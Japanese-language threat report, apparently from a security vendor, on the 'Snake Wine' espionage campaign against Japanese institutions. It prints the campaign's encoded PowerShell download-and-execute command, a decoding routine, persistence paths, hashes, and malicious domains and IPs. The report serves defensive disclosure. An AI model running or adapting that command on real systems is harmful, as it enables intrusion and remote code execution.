サイランスでは、セキュリティ業界で頻発している問題を明らかにし、広く公開する取組みを続けています。今回はアトリビューションを偽ることが、どれほど容易かについて明らかにしたいと思います。業界として注目すべきは、攻撃者が誰なのか?という点に焦点をあてるだけでなく、攻撃者がどの様に攻撃を成功させているのかという点について分析することです。攻撃がどのように行われたのか特定出来れば、最も重要な「防御」に注力することが出来るからです。
背景情報
サイランスのリサーチチームが、サイバー攻撃者グループである「APT28(Sofacyとしても知られる)」が日常的にインフラのホストに使用しているいくつかの小規模なドメインネームサーバーの調査をしている中で、2016年8月頃に始まった日本企業や政府、教育機関を標的としたと思われる長期的な攻撃活動を新たに発見しました。APT28のドメイン登録名の様式が以前使用されたドメイン名に不気味なほど似ていますが、攻撃に使用されたマルウェアはまったく同じではないようです。この調査中に、JP-CERTからこのグループが仕掛けたバックドアの一部に関する解析が公開されました(https://www.jpcert.or.jp/magazine/acreport-ChChes.html)。サイランスはこの脅威グループを「Snake Wine 以下、スネーク・ワイン」と名づけて追跡調査を行いました。
サイランスは、この脅威グループのインフラが上記リンク先にある解説よりもはるかに大規模なものであることを解明しました。攻撃者が実行した手順はおそらく、有名な攻撃者グループCN-APTにつながる古いインフラのいくつかを基盤としたより大規模な偽情報を使った攻撃活動であったと考えられます。このケースの初期データはほぼすべて、「It Itch」でホストされているドメインを詳細に調べることで収集されました。韓国のNIS(大韓民国国家情報院)は、以前It Itchのサービスを利用していました。これについては、Citizen Labが記事(https://citizenlab.org/2015/08/what-we-know-about-the-south-korea-niss-use-of-hacking-teams-rcs/)で解説しています。いくつかのサンプルはHacking Teamへの侵害によって漏洩したコードサイニング証明書を署名に使用していました。
プロパゲーションと標的
現状、確認されているすべての攻撃は、標的企業に対して試みられたスピアフィッシングによるものでした。最新のバッチでは、巧妙に作られたLNKファイルがパスワードで保護された類似した名前のZIPファイルに含まれていました。このLNKファイルは、開くと「cmd.exe /c」を介してPowerShellコマンドを実行し、追加のペイロードをダウンロードして実行します。攻撃者はGoogleのURL短縮サービス「goog.gl」を好んでいるようですが、これは攻撃が進化するとすぐに変わる可能性があります。
powershell.exe -nop –w hidden -exec bypass -enc “JAAyAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGUAeABlAGMAIABiAHkAcABhAHMAcwAgAC0AYwAgACIASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwAHMAOgAvAC8AZwBvAG8ALgBnAGwALwBjAHAAVAAxAE4AVwAnACcAKQAiACcAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACIAOwB9AGUAbABzAGUAewBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIgA7AH0A |
図 1: LNKファイル内に含まれているエンコードされたPowerShell Cmdlet
$2='-nop -w hidden -exec bypass -c "IEX (New-Object |
図 2: デコードされたPowerShellスニペット
短縮URLは 「hxxxp://koala (dot) acsocietyy (dot) com/acc/image/20170112001 (dot) jpg」に接続していました。このファイルは、実際には「PowerSploit」、「https://github.com/PowerShellMafia/PowerSploit」から改造された別のPowerShellコードでした。このコードが次におとりのドキュメントを開き、約60KBの位置独立シェルコードのチャンクを実行します。このシェルコードをさらにデコードおよび解析すると、サイランスが「Hamバックドア」(下記)と呼ぶものとほぼ同じになります。この特定のバックドア亜種は、内部的にそれ自体をバージョン「1.6.4」として参照し、「gavin (dot) ccfchrist (dot) com」にビーコンを送ります。シェルコードベースのバックドアへの移行が行われたのは、おそらく、全体的なAV検出を減らして幅広い方法でのデプロイを可能にするためでしょう。ある公開レポート(https://csirt.ninja/?p=1103)が類似のケースについて説明しています。こちらでは複数の大学が、日本学術振興会「jsps (dot) go (dot) jp」を装った助成金繰り越しに関する電子メールの標的になりました。Web サイト「koala (dot) asocietyy (dot) com」も次のPowerShellペイロードをホストするために使用されました。
- ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86 20170112003.jpg
- ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86 20170112003.jpg
- 75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f 20170112002.jpg
- 723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48 20170112007.jpg
- 3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03 20170112005.jpg
- 471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856 20170112.jpg
- 4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b671029720170112001.jpg
- 9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d20170112006.jpg
- f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b 20170112008.jpg
- 646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543 20170112004.jpg
これらのペイロードは各PowerShellスクリプト内に入れられて同じドメイン名にビーコンとして送信されました。例外は「20170112008.jpg」で、「hamiltion (dot) catholicmmb (dot) com」に送信されています。
前述の攻撃では、JP-CERTによる解説のとおり、Microsoft Wordドキュメントのアイコンで偽装したEXEとDOCXファイルに似た名前のZIPファイルに含まれていました。サイランスでは、同様の名前を持つ実行ファイルが含まれる次のZIPファイルを確認しました。
- 平成29年日米安保戦略対話提言(未定稿).zip
- 2016県立大学シンポジウムA4_1025.zip
- 日米関係重要事項一覧表.zip
- ロシア歴史協会の設立と「単一」国史教科書の作成.zip
- 日米拡大抑止協議.zip
- 個人番号の提供について.zip
- 11月新学而会.zip
マルウェア
Hamバックドア
Hamバックドアは、主にモジュラープラットフォームとして機能し、攻撃者が追加のモジュールを直接ダウンロードしてコマンドアンドコントロール(以下、C2)サーバーからメモリ内で実行できるようにします。このバックドアはC++でプログラムされ、Visual Studio 2015を使用してコンパイルされています。これまでにサイランスで確認したモジュールには次の機能がありました。
- 特定のファイルをC2にアップロードする
- ファイルを感染したマシンにダウンロードする
- DLLペイロードをロードして実行する
- 実行中のプロセスとサービスをリストする
- シェルコマンドを実行する
- ネットワークプロトコルにAES暗号化レイヤを追加する
- ファイル内のキーワードを検索する
従来型アンチウイルスソフトはほとんどのサンプルに対応しており、健闘しているように見えますが、サンプルが新しくなるほど、軽微な変更によって検出率が大幅に低下します。JP-CERTでは、このバックドアをChChesと呼んでいます。このマルウェアでは、難読化のために複数の技法を利用しています。たとえば、変数とデータのスタック作成、さまざまなXORエンコードおよびデータ並べ替えスキーム、抗分析技法などです。これらの中でおそらく最も興味深く、検出という観点からここで取り上げるのは次のアセンブリです。これは、エンコードされた大きなコードブロックのデコードにおける最後のコンポーネントです。
lea edx, [esi+edi]
mov edi, [ebp+var_4]
mov cl, [ecx+edx]
xor cl, [eax+edi]
inc eax
mov edi, [ebp+arg_8]
mov [edx], cl
mov ecx, [ebp+arg_0]
cmp eax, ebx
解析されたサンプルに含まれるこのスニペットでは、通常は0x66バイト長の固定サイズのXORキーを使用しますが、キーの値ごとに順次1バイトずつXORします。これによって事実上、操作の最後までに1バイトのXORが行われます。この操作は、このメカニズムに先だって使用された他のより複雑な並べ替えやより長いXORエンコードに比べるとほとんど意味がありません。サイランスが発見したのはこのコードブロックの亜種2つのみですが、将来的に攻撃者によって容易に改造される可能性があります。このコードはまた、プレフィックスが0x0F1FのマルチバイトNOP操作も幅広く使用しています。これらの操作は、最初のOllydbgのような古い逆アセンブラでは何らかの問題を起こしますが、簡単に修正できます。このバックドアのネットワークプロトコルについては、JP-CERTがわかりやすく説明していますが、サイランスでは、Cookie値をデコードするために提供されている元のpythonスニペットを独自にクリーンアップしてみました。
import hashlib def network_decode(cookie_data): |
図 3: クリーンアップしたJP-CERT提供のスクリプト
JP-CERTのレポートの説明と同様に、サイランスでも、感染が成功したケースのほとんどで、システムに最も早い段階でダウンロードされたモジュールのいずれかによってトラフィックにAESコミュニケーションレイヤが追加されたことを発見しました。このバックドアは、C2サーバーが最初の要求に適切に応答しなかった場合は「ST」メソッドを使用して変則的なHTTP要求も発行します。
要求の例は以下を参照してください。
ST /2C/H.htm HTTP/1.1 |
図 4: 「ST」メソッドを使用する要求例
これまでに発見されているHamバックドアの大半は、すべてHacking Team (www.hackingteam.it/)の盗まれたか、漏洩したコードサイニング証明書を使用して署名されていました。
‘HT Srl’ Certificate Details:
Status: Revoked
Issuer: VeriSign Class 3 Code Signing 2010 CA
Valid: 1:00 AM 8/5/2011 to 12:59 AM 8/5/2012
Thumbprint: B366DBE8B3E81915CA5C5170C65DCAD8348B11F0
Serial Number: 3F FC EB A8 3F E0 0F EF 97 F6 3C D9 2E 77 EB B9
攻撃者がなぜこの期限切れ証明書を使用してマルウェアサンプルに署名することにしたのか、正確な理由はわかりません。マルウェアそのものは、それまでのHacking Teamのインプラントとはほとんど似ていませんが、単に帰属を消そうとして行われた可能性があります。これまでに確認された唯一のパーシスタンス方法は、ユーザーのハイブまたはHKLMの下で標準のWindows Runキー「SOFTWARE\Microsoft\Windows\CurrentVersion\Run」を使用する方法です。サイランスでは、次の3つのフルファイルパスがこの特定のバックドアでよく使用されていることを突き止めました。
- %AppData%\Reader.exe
- %AppData%\Notron.exe
- %AppData%\SCSI_Initiarot.exe
また、Microsoftリソースコンパイラ「RC.exe」の自己解凍型RARとサイドローディングの脆弱性を利用する、初期のサンプルも特定しました。RC.exeは、インポートテーブルを経由してDLL「RCDLL.dll」を読み込みます。この亜種DLLは、Hamバックドアのシェルコード版のXORデコードとマッピングに関与していました。このサンプルは、「RC.cfg」というファイルに保存され、このファイルは1バイトのXORを使用して0x54のキーに対してエンコードされます。最近確認されたバックドアのバージョンは「v1.2.2」このバージョンが使用されたのは初期のキャンペーンのみだったと思われます。
Tofuバックドア
サイランスの調査によると、Tofuバックドアのデプロイ事例数はHamバックドアよりはるかに少なくなります。Tofuはプロキシ対応のフル機能バックドアで、C++でプログラムされ、Visual Studio 2015を使用してコンパイルされています。また、スレッディングを幅広く使用してコード内で個々のタスクを実行します。非標準TCPポート経由のHTTPでC2サーバーと通信し、POSTのコンテンツとしてホスト名、ユーザー名、オペレーティングシステムなど基本的なシステム情報を含むエンコードされた情報を返送します。
POST /586E32A1FFFFFFFF.aspx HTTP/1.1 |
図 5: TofuバックドアからのPOST要求の例
通信はTCPポート443上で行われますが、トラフィックは一切暗号化されず、カスタムCookie「Sym1.0」~「Sym4.0」を使用してネットワークトラフィック内のバックドアを容易に識別できます。このバックドアから、プロセッサ、メモリ、ドライブ、およびボリューム情報の列挙、攻撃者によるコマンドの直接実行、ファイルとフォルダの列挙と削除、ファイルのアップロードとダウンロードができます。コマンドはC2によって送信され、エンコードされたDWORDの形式でバックドアによって処理されます。各DWORDがそれぞれ前述した特定のアクションに対応します。Tofuはまた、システム上に2つの異なる双方向の名前付きパイプも作成します。このパイプ「\\.\pipe\1[12345678]」と「\\.\pipe\2[12345678]」は、内部ネットワーク上にある他の侵害されたマシンを経由してアクセス可能です。
さらに調査したところ、ファイルは「%AppData%\iSCSI_Initiarot.exe」にあり、このパスはコード内の静的な場所で、バックドアがそれ自体をコピーするために使用することが確認されました。バックドアでは、静的なRunキー「HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft iSCSI Initiator」も使用して標的マシン上にパーシスタンスを設定しています。サイランスが識別したすべてのサンプルは2016年11月にコンパイルされていました。その後のサンプルがシェルコードベースのHamバックドアに戻っているため、これらのバックドアはただのテストであった可能性もあります。このバックドアも、「HT Srl」からの同じ盗まれたコードサイニング証明書を使用して同様に署名されています。
C2インフラストラクチャ
サイランスでは、このサイバー攻撃活動に関連付けられているインフラの半分以上が未開発か、少なくとも未使用に見えることを発見しました。つまり、攻撃者グループのスネーク・ワインは今後アクティビティを発展させ、日本国内の民間企業と政府機関の両方を永続的に標的にする可能性があります。サイランスではまた、おそらく同じグループで使用されている、複数の無料プロバイダ経由で登録されたダイナミックDNS (DDNS)ドメインの広範なネットワークも見つけました。ただし、過去にこのインフラストラクチャと通信していて、その後このアクティビティを攻撃者の残りのインフラストラクチャから分離している現在のサンプルは一切識別できませんでした。多くのDDNSドメインは、「download.windowsupdate (dot)com」、「ipv4.windowsupdate (dot)com」、「v4.windowsupdate (dot)com」など、正規のWindows Updateドメインに見せかけて作り上げられています。
ドメイン登録情報:
8/19/16 wchildress(dot)com abellonav.poulsen(at)yandex.com
8/19/16 poulsenv(dot)com abellonav.poulsen(at)yandex.com
8/19/16 toshste(dot)com toshsteffensen2(at)yandex.com
9/6/16 shenajou(dot)com ShenaJouellette(at)india.com
9/6/16 ixrayeye(dot)com BettyWBatts(at)india.com
9/12/16 wthelpdesk(dot)com ArmandOValcala(at)india.com
9/12/16 bdoncloud(dot)com GloriaRPaige(at)india.com
9/12/16 belowto(dot)com RobertoRivera(at)india.com
11/3/16 incloud-go(dot)com RufinaRWebb(at)india.com
11/3/16 unhamj(dot)com JuanitaRDunham(at)india.com
11/3/16 cloud-maste(dot)com MeganFDelgado(at)india.com
11/4/16 cloud-kingl(dot)com ElisabethBGreen(at)india.com
11/4/16 incloud-obert(dot)com RobertJButler(at)india.com
12/6/16 fftpoor(dot)com SteveCBrown(at)india.com
12/6/16 ccfchrist(dot)com WenonaTMcMurray(at)india.com
12/7/16 catholicmmb(dot)com EmilyGLessard(at)india.com
12/7/16 usffunicef(dot)com MarisaKParr(at)india.com
12/7/16 cwiinatonal(dot)com RobertMKnight(at)india.com
12/7/16 tffghelth(dot)com NathanABecker(at)india.com
12/7/16 acsocietyy(dot)com PearlJBrown(at)india.com
12/8/16 tokyo-gojp(dot)com VeraTPerkins(at)india.com
12/8/16 salvaiona(dot)com DeborahAStutler(at)india.com
12/8/16 osaka-jpgo(dot)com JudithAMartel(at)india.com
12/8/16 tyoto-go-jp(dot)com AletaFNowak(at)india.com
12/8/16 fastmail2(dot)com ClementBCarico(at)india.com
12/11/16 wcwname(dot)com CynthiaRNickerson(at)india.com
12/12/16 dedgesuite(dot)net KatherineKTaggart(at)india.com
12/12/16 wdsupdates(dot)com GordonESlavin(at)india.com
12/12/16 nsatcdns(dot)com SarahNBosch(at)india.com
12/13/16 vscue(dot)com ChrisTDawkins(at)india.com
12/13/16 sindeali(dot)com DonnaJMcCray(at)india.com
12/13/16 vmmini(dot)com RaymondRKimbrell(at)india.com
12/20/16 u-tokyo-ac-jp(dot)com LynnJOwens(at)india.com
12/21/16 meiji-ac-jp(dot)com PearlJPoole(at)india.com
12/26/16 jica-go-jp(dot)bike AliceCLopez(at)india.com
12/27/16 mofa-go-jp(dot)com AngelaJBirkholz(at)india.com
12/27/16 jimin-jp(dot)biz EsmeraldaTYates(at)india.com
12/27/16 jica-go-jp(dot)biz RonaldSFreeman(at)india.com
2/9/17 jpcert(dot)org GinaKPiller(at)india.com
2/14/2017 ijica(dot)in DarrenMCrow(at)india.com
2/17/2017 chibashiri(dot)com WitaTBiles(at)india.com
2/17/2017 essashi(dot)com CarlosBPierson(at)india.com
2/17/2017 urearapetsu(dot)com IvoryDStallcup(at)india.com
全ドメインリスト:
area.wthelpdesk(dot)com
cdn.incloud-go(dot)com
center.shenajou(dot)com
commissioner.shenajou(dot)com
development.shenajou(dot)com
dick.ccfchrist(dot)com
document.shenajou(dot)com
download.windowsupdate.dedgesuite(dot)net
edgar.ccfchrist(dot)com
ewe.toshste(dot)com
fabian.ccfchrist(dot)com
flea.poulsenv(dot)com
foal.wchildress(dot)com
fukuoka.cloud-maste(dot)com
gavin.ccfchrist(dot)com
glicense.shenajou(dot)com
hamiltion.catholicmmb(dot)com
hukuoka.cloud-maste(dot)com
images.tyoto-go-jp(dot)com
interpreter.shenajou(dot)com
james.tffghelth(dot)com
kawasaki.cloud-maste(dot)com
kawasaki.unhamj(dot)com
kennedy.tffghelth(dot)com
lennon.fftpoor(dot)com
license.shenajou(dot)com
lion.wchildress(dot)com
lizard.poulsenv(dot)com
malcolm.fftpoor(dot)com
ms.ecc.u-tokyo-ac-jp(dot)com
msn.incloud-go(dot)com
sakai.unhamj(dot)com
sappore.cloud-maste(dot)com
sapporo.cloud-maste(dot)com
scorpion.poulsenv(dot)com
shrimp.bdoncloud(dot)com
sindeali(dot)com
style.u-tokyo-ac-jp(dot)com
trout.belowto(dot)com
ukuoka.cloud-maste(dot)com
v4.windowsupdate.dedgesuite(dot)net
vmmini(dot)com
whale.toshste(dot)com
windowsupdate.dedgesuite(dot)net
windowsupdate.wcwname(dot)com
www.cloud-maste(dot)com
www.foal.wchildress(dot)com
www.fukuoka.cloud-maste(dot)com
www.incloud-go(dot)com
www.kawasaki.cloud-maste(dot)com
www.kawasaki.unhamj(dot)com
www.lion.wchildress(dot)com
www.msn.incloud-go(dot)com
www.sakai.unhamj(dot)com
www.sapporo.cloud-maste(dot)com
www.unhamj(dot)com
www.ut-portal-u-tokyo-ac-jp.tyoto-go-jp(dot)com
www.vmmini(dot)com
www.wchildress(dot)com
www.yahoo.incloud-go(dot)com
yahoo.incloud-go(dot)com
zebra.bdoncloud(dot)com
zebra.incloud-go(dot)com
zebra.wthelpdesk(dot)com
IPアドレス:
107.181.160.109
109.237.108.202
151.101.100.73
151.236.20.16
158.255.208.170
158.255.208.189
158.255.208.61
160.202.163.79
160.202.163.82
160.202.163.90
160.202.163.91
169.239.128.143
185.117.88.81
185.133.40.63
185.141.25.33
211.110.17.209
31.184.198.23
31.184.198.38
92.242.144.2
異常なIPクロスオーバー
この特定の攻撃活動に関連付けられたインフラのトレースで最もややこしい部分の1つは、それが大量のよく知られた「MenuPass」/「Stone Panda」ドメインにつながっているように見えることです。MenuPassは、すでにあちこちで証明されているように攻撃者グループCN-APTですが、そのルーツは2009年までさかのぼります。このグループが最初に公表されたのはFireEyeのレポート(https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf)でした。ただし、これらのドメインの多くは、2年以上もの間、非アクティブで、帰属を難読化しようとしている別のエンティティによってすでに再登録されている可能性もあります。
ダイナミックDNSドメイン:
blaaaaaaaaaaaa.windowsupdate(dot)3-a.net
contract.4mydomain(dot)com
contractus.qpoe(dot)com
ctdl.windowsupdate.itsaol(dot)com
ctldl.microsoftupdate.qhigh(dot)com
ctldl.windowsupdate.authorizeddns(dot)org
ctldl.windowsupdate.authorizeddns(dot)us
ctldl.windowsupdate.dnset(dot)com
ctldl.windowsupdate.lflinkup(dot)com
ctldl.windowsupdate.x24hr(dot)com
download.windowsupdate.authorizeddns(dot)org
download.windowsupdate.dnset(dot)com
download.windowsupdate.itsaol(dot)com
download.windowsupdate.lflinkup(dot)com
download.windowsupdate.x24hr(dot)com
ea.onmypc(dot)info
eu.wha(dot)la
feed.jungleheart(dot)com
fire.mrface(dot)com
fuck.ikwb(dot)com
globalnews.wikaba(dot)com
helpus.ddns(dot)info
home.trickip(dot)org
imap.dnset(dot)com
ipv4.windowsupdate.3-a(dot)net
ipv4.windowsupdate.authorizeddns(dot)org
ipv4.windowsupdate.dnset(dot)com
ipv4.windowsupdate.fartit(dot)com
ipv4.windowsupdate.lflink(dot)com
ipv4.windowsupdate.lflinkup(dot)com
ipv4.windowsupdate.mylftv(dot)com
ipv4.windowsupdate.x24hr(dot)com
latestnews.organiccrap(dot)com
microsoftmirror.mrbasic(dot)com
microsoftmusic.itemdb(dot)com
microsoftstore.onmypc(dot)net
microsoftupdate.qhigh(dot)com
mobile.2waky(dot)com
mseupdate.ourhobby(dot)com
newsreport.justdied(dot)com
nmrx.mrbonus(dot)com
outlook.otzo(dot)com
referred.gr8domain(dot)biz
twx.mynumber(dot)org
v4.windowsupdate.authorizeddns(dot)org
v4.windowsupdate.dnset(dot)com
v4.windowsupdate.itsaol(dot)com
v4.windowsupdate.lflinkup(dot)com
v4.windowsupdate.x24hr(dot)com
visualstudio.authorizeddns(dot)net
windowsupdate.2waky(dot)com
windowsupdate.3-a(dot)net
windowsupdate.acmetoy(dot)com
windowsupdate.authorizeddns(dot)net
windowsupdate.authorizeddns(dot)org
windowsupdate.dns05(dot)com
windowsupdate.dnset(dot)com
windowsupdate.esmtp(dot)biz
windowsupdate.ezua(dot)com
windowsupdate.fartit(dot)com
windowsupdate.itsaol(dot)com
windowsupdate.lflink(dot)com
windowsupdate.mrface(dot)com
windowsupdate.mylftv(dot)com
windowsupdate.x24hr(dot)com
www.contractus.qpoe(dot)com
www.feed.jungleheart(dot)com
www.helpus.ddns(dot)info
www.latestnews.organiccrap(dot)com
www.microsoftmirror.mrbasic(dot)com
www.microsoftmusic.itemdb(dot)com
www.microsoftstore.onmypc(dot)net
www.mobile.2waky(dot)com
www.mseupdate.ourhobby(dot)com
www.nmrx.mrbonus(dot)com
www.twx.mynumber(dot)org
www.visualstudio.authorizeddns(dot)net
www.windowsupdate.acmetoy(dot)com
www.windowsupdate.authorizeddns(dot)net
www.windowsupdate.authorizeddns(dot)org
www.windowsupdate.dnset(dot)com
www.windowsupdate.itsaol(dot)com
www.windowsupdate.x24hr(dot)com
www2.qpoe(dot)com
www2.zyns(dot)com
www2.zzux(dot)com
結論
攻撃者グループ「スネーク・ワイン」は順応性が非常に高く、標的の環境内への足がかりを得るために次々と新しい戦術を導入してきています。このグループは既存の攻撃インフラの構築と活用を始めており、日本政府、日本の教育機関や企業を特に標的に選ぶという傾向は今後も続くと予想されます。
過去の動向が正確な指針であるとすれば、これまでに公開された情報をもとに防御体制が強化されるのに対抗して、スキル的にも強度的にも攻撃がエスカレートしていくと思われます。
スネーク・ワインの最も興味深い側面は、アトリビューションを不明瞭にするために使用される技法の多さです。盗まれた後に流出した コードサイニング証明書でマルウェアに署名するなどは、有名なCN-APTグループにしてもお粗末です。また、アトリビューションの不明瞭化という観点から見ると、既知のCN-APTアクティビティに関連した以前のダイナミックDNSドメインとダイレクトIPをクロスオーバーさせることも特に興味深い点です。有能な調査員なら、この新しいアクティビティの犯人であるCNオペレータを特定できるような直接ルートが何年も前に確立されています。
MenuPassグループが利用していたのは公開されているRATばかりでしたが、それでも多数の価値の高い標的に侵入することに成功していますから、これが過去のアクティビティの続きであるという可能性は大いにあります。ただし、このアクティビティからはすでにかなり時間が経過していることから、サイランスではその可能性は低いと考えています。また、もう1点注目すべきは、よく知られたロシアのAPT28というグループが多用していたBTCを受け入れるドメインホスティング会社が利用されていることです。
いずれにしても、サイランスではネットワーク内でアクティブな脅威を検知して対応できるように、セキュリティコミュニティがより広く同様の脅威に対応できるようにしてきたいと願っています。マルウェアの防御と対応に関して言えば、アトリビューションが重要になることはほとんどありません。今後新しい手法がもっと広く検知されるようになるにつれて、攻撃側も別の新しい戦略を考えて目的を達成しようとするでしょう。
サイランスのエンドポイント防御製品をCylancePROTECT®ご利用中のお客様は、 すでにこの攻撃から保護されています。CylancePROTECTをご利用でない場合、AI(人工知能)を活用した弊社ソリューションがいかにして未知の新しい脅威を予測・阻止できるかについてぜひサイランスまでお問い合わせください。